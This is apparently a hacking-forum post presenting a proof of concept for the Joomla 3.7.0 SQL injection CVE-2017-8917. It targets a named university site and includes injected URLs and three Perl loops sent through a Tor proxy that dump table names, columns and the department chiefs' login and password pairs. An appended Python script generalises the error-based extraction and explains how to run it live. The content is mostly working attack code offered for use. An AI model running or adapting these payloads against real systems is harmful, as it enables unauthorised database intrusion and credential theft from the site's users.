Joomla 3.7.0 (CVE-2017-8917) PoC [TUTO XPATH]



05-20-2017, 12:06 PM #1
CrashBandicot (MaDLeeTs LoVer)
Posts: 104 Threads: 15 Joined: Jul 2013 Reputation: 4
Salem Aleykoum

PoC CVE-2017-8917



Getting the database:
http://pcnd.univ-exemple.dz/index.ph...out=modal&list[fullordering]=updatexml(null,concat(0x3a,(database())),null)&lang=ar


[Image: 816125311.png]


DB used: bdnote4

Count the number of tables:

http://pcnd.univ-exemple.dz/index.ph...out=modal&list[fullordering]=updatexml(null,concat(0x3a,(select COUNT(*) from information_schema.tables where table_schema=database())),null)&lang=ar



[Image: 278496252.png]



Now I make a loop in Perl to grab the tables:


Code:
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;

print "\t      *****************\n\t      Getting Tables\n\t       *****************\n\n\n";
print "\n";

# One request per row: LIMIT $i,1 picks the i-th table name and updatexml()
# echoes it back inside the "XPATH syntax error" message of the error page.
for (my $i = 0; $i < 99; $i++) {
    my $ua = LWP::UserAgent->new();
    # Route through a local Tor SOCKS proxy (requires LWP::Protocol::socks)
    $ua->proxy([qw/ http https /] => 'socks://127.0.0.1:9050');
    $ua->agent("Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36");
    my $res = $ua->get("http://pcnd.univ-exemple.dz/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%28null,concat%280x3a,%28select%20table_name%20from%20information_schema.tables%20where%20table_schema=database%28%29%20limit%20".$i.",1%29%29,null%29&lang=ar")->content;

    # The leaked value sits between the ':' marker and the closing quote
    if ($res =~ m/XPATH syntax error: ':(.*?)'<\/title>/) {
        print $i . " _  " . $1 . "\n";
    }
}
__END__
[Image: 715753633.png]




Now get the columns from the table departements.

First count the number of columns:

http://pcnd.univ-exemple.dz/index.ph...out=modal&list[fullordering]=updatexml(null,concat(0x3a,(select count(*) from information_schema.columns where table_schema=database() and table_name=0x646570617274656d656e7473)),null)&lang=ar


Now also make a loop to get the 13 columns of the table:


Code:
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;

print "\t      *****************\n\t      Get   columns *****************\n\n\n";
print "\n";

# 13 columns were counted above; the table name is passed as a hex literal
# (0x646570617274656d656e7473 = 'departements') so the payload needs no quotes.
for (my $i = 0; $i < 13; $i++) {
    my $ua = LWP::UserAgent->new();
    $ua->proxy([qw/ http https /] => 'socks://127.0.0.1:9050'); # tor socks (requires LWP::Protocol::socks)
    $ua->agent("Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36");
    my $res = $ua->get("http://pcnd.univ-exemple.dz/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%28null,concat%280x3a,%28select%20column_name%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20table_name=0x646570617274656d656e7473%20limit%20".$i.",1%29%29,null%29&lang=ar")->content;

    if ($res =~ m/XPATH syntax error: ':(.*?)'<\/title>/) {
        print $i . " _  " . $1 . "\n";
    }
}
__END__

[Image: 929010315.png]



Now getting the data.

Count the data:

http://pcnd.univ-exemple.dz/index.ph...out=modal&list[fullordering]=updatexml(null,concat(0x3a,(select count(passwordchefdep) from departements)),null)&lang=ar

Now get the data:



Code:
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;

print "\t      *****************\n\t    Getting Data \n*****************\n\n\n";
print "\n";

# 17 rows were counted above; login and password are joined with ':' (0x3a)
# so both come back in a single error message per row.
for (my $i = 0; $i < 17; $i++) {
    my $ua = LWP::UserAgent->new();
    $ua->proxy([qw/ http https /] => 'socks://127.0.0.1:9050'); # tor socks (requires LWP::Protocol::socks)
    $ua->agent("Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36");
    my $res = $ua->get("http://pcnd.univ-exemple.dz/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%28null,concat%280x3a,%28select%20concat%28loginchefdep,0x3a,passwordchefdep%29%20from%20departements%20limit%20".$i.",1%29%29,null%29&lang=ar")->content;

    if ($res =~ m/XPATH syntax error: ':(.*?)'<\/title>/) {
        print $i . " _  " . $1 . "\n";
    }
}
__END__

[Image: 400317764.png]


Done.


Other example:

[Image: 918243exemple.png]


Enjoy
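The three Perl loops above are the same error-based extraction step repeated with a different subquery. The script below is an added example, not code from the post, that folds them into one extractor and handles a limit the post does not mention: MySQL truncates the text echoed in an XPATH syntax error to 32 characters (31 after the ':' marker), so a long value such as a password hash would come back cut off. It reads each row in 31-character pieces with substring() until a short piece signals the end. The target host is the one from the post and is used only as an illustrative base URL; `fake_fetch` and `FAKE_ROWS` are a constructed stand-in for the vulnerable site so the script runs offline, and `http_fetch` is the transport you would pass in for a live run.

```python
import re
import urllib.parse
import urllib.request

# Assumed target: the host from the post is kept only as an illustrative base URL.
BASE = "http://pcnd.univ-exemple.dz/index.php"
# MySQL truncates the text echoed in an XPATH syntax error to 32 characters;
# one of them is the ':' marker from concat(0x3a, ...), leaving 31 for data.
CHUNK = 31


def hexlit(s):
    """MySQL hex literal, so the payload carries no quotes for escape() to mangle."""
    return "0x" + s.encode().hex()


def build_url(expr):
    """Embed a scalar SQL expression in the list[fullordering] parameter.

    updatexml() rejects its 2nd argument as invalid XPath and echoes it in the
    error message, which is how the value comes back to the client.
    """
    params = {
        "option": "com_fields",
        "view": "fields",
        "layout": "modal",
        "list[fullordering]": f"updatexml(null,concat(0x3a,({expr})),null)",
        "lang": "ar",
    }
    return BASE + "?" + urllib.parse.urlencode(params)


LEAK_RE = re.compile(r"XPATH syntax error: ':(.*?)'")


def parse_leak(body):
    """Return the leaked text after the ':' marker, or None if no error was raised."""
    m = LEAK_RE.search(body)
    return m.group(1) if m else None


def dump_rows(fetch, row_query, max_rows=99):
    """Read every row of `row_query` (a one-column SELECT without LIMIT).

    Each row is read in CHUNK-sized pieces with substring() so values longer
    than 31 characters are not silently truncated by the error message.
    `fetch(url) -> str` is the transport, injected so the logic runs offline.
    """
    rows = []
    for row in range(max_rows):
        value, start = "", 1
        while True:
            expr = f"substring(({row_query} limit {row},1),{start},{CHUNK})"
            leak = parse_leak(fetch(build_url(expr)))
            if leak is None:
                # LIMIT past the last row yields NULL, concat() becomes NULL and
                # updatexml() no longer errors: the result set is exhausted.
                return rows
            value += leak
            if len(leak) < CHUNK:
                break
            start += CHUNK
        rows.append(value)
    return rows


def http_fetch(url):
    """Real transport for a live run (the post routed this through a Tor SOCKS proxy)."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode("utf-8", "replace")


# Constructed stand-in for the vulnerable site so the script runs offline.
# It mimics MySQL's LIMIT/SUBSTRING handling and the 32-character truncation.
FAKE_ROWS = ["departements", "a_table_name_longer_than_thirty_one_chars", "users"]


def fake_fetch(url):
    qs = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)
    ordering = qs["list[fullordering]"][0]
    m = re.search(r"substring\(\(.* limit (\d+),1\),(\d+),(\d+)\)", ordering)
    row, start, length = (int(x) for x in m.groups())
    if row >= len(FAKE_ROWS):
        return "<html><head><title>Fields</title></head><body>no error</body></html>"
    piece = FAKE_ROWS[row][start - 1:start - 1 + length]
    msg = (":" + piece)[:32]
    return f"<html><head><title>Error: XPATH syntax error: '{msg}'</title></head></html>"


if __name__ == "__main__":
    tables = "select table_name from information_schema.tables where table_schema=database()"
    for i, name in enumerate(dump_rows(fake_fetch, tables)):
        print(i, "_", name)
```

For a live run pass `http_fetch` instead of `fake_fetch` (adding the proxy there if you want the post's Tor routing) and any of the post's subqueries as `row_query`, e.g. `select concat(loginchefdep,0x3a,passwordchefdep) from departements`. Stopping on the first request that raises no XPATH error replaces the hard-coded loop bounds (99, 13, 17) that the Perl scripts needed a separate count() query for.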